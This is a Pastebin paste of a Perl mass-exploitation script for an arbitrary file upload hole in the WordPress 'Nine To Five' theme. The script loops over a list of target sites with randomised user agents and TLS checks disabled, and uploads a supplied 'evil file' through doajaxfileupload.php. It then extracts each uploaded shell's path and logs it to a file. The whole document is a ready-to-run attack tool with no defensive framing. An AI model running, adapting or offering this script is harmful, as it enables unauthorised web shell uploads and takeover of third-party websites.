Advertisement
Guest User

hdhdd

a guest
Jul 3rd, 2015
290
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 3.10 KB | None | 0 0
  1. #!/usr/bin/perl
  2. use LWP::UserAgent;
  3. use HTTP::Cookies;
  4. # Bug Founder Miutex
  5. # Coded By M-A
  6. # Greet's : My Brother Mootaz & Boy & MMxM & Rab3oun & All Sec4ever Menber
  7. # Perl Lov3r :)
  8. my $qqvul ="/doajaxfileupload.php";#theme path vul
  9. my $log = "log.txt";
  10. my $datestring = localtime();
  11. my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
  12.  
  13. sub randomagent {
  14. my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  15. 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
  16. 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
  17. 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
  18. 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
  19. 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
  20. );
  21. my $random = $array[rand @array];
  22. return($random);
  23. }
  24. flag();
  25. print "[+] Enter List Of Target : ";
  26. chomp (my $list=<>);
  27. print "[+] Enter Evil File : ";
  28. chomp (my $file=<>);
  29. print "[+] Started : $datestring\n";
  30. open(my $arq,'<'.$list) || die($!);
  31. my @site = <$arq>;
  32. @site = grep { !/^$/ } @site;
  33. close($arq);
  34. print "[".($#site+1)."] URL to test upload\n\n";
  35. my $i;
  36. foreach my $web(@site){$i++;
  37.     chomp($web);
  38.     if($web !~ /^(http|https):\/\//){
  39.         $web = 'http://'.$web;
  40.     }
  41. print "[$i] $web \n";
  42. expqq($web);#exploiting website :)
  43. }
  44. sub expqq{
  45.     my $useragent = randomagent();#Get a Random User Agent
  46.     my $cookie_jar = HTTP::Cookies->new;
  47.     my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 },cookie_jar => $cookie_jar);#Https websites accept
  48.     $ua->timeout(10);
  49.     $ua->agent($useragent);
  50.     print "[Testing] Exploit Existence \n";
  51.     my $url = $_[0]."/wp-content/themes/ninetofive/scripts/".$qqvul;
  52.     my $response = $ua->get($url);
  53.     if ($response->is_success || $response->content=~/error/){
  54.         print "[OK] Exploit Exists\n";
  55.         print "[*] Sent payload\n";
  56.         my $regex = 'success';
  57.         my $body = $ua->post( $url,
  58.             Content_Type => 'form-data',
  59.             Content => [ 'qqfile' => ["$file"] ]
  60.         );
  61.         if ($body->is_success ||$body->content=~ /$regex/){
  62.             print "[+] Payload successfully executed\n";
  63.             print "[*] Checking if shell was uploaded\n\n";
  64.             my $x = $cookie_jar->set_cookie->as_string;
  65.             my @ss = split (/uploads/,$x);
  66.             my @r = split (/; path=/,$ss[1],0);
  67.             print "[Path] $_[0]/wp-content/uploads/$r[0]\n\n";
  68.             save ($log,"$_[0]/wp-content/uploads/$r[0]");
  69.         }
  70.         else {
  71.             print "[-] Payload failed : Not vulnerable\n\n";
  72.         }
  73.     }
  74.     else {
  75.         print "[No] Exploit Not Found\n\n";
  76.     }
  77. }
  78. sub flag {
  79.     print "\n[+] WP Nine To Five Theme File Upload Exploiter \n[*] Coder => M-A \n[*] Bug Founder Miutex \n(c) Sec4ever\n\n";
  80. }
  81.  
  82. sub save {
  83.     my ($file,$item) = @_;
  84.     open(SAVE,">>".$file);
  85.     print SAVE $item."\n";
  86.     close(SAVE);
  87. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement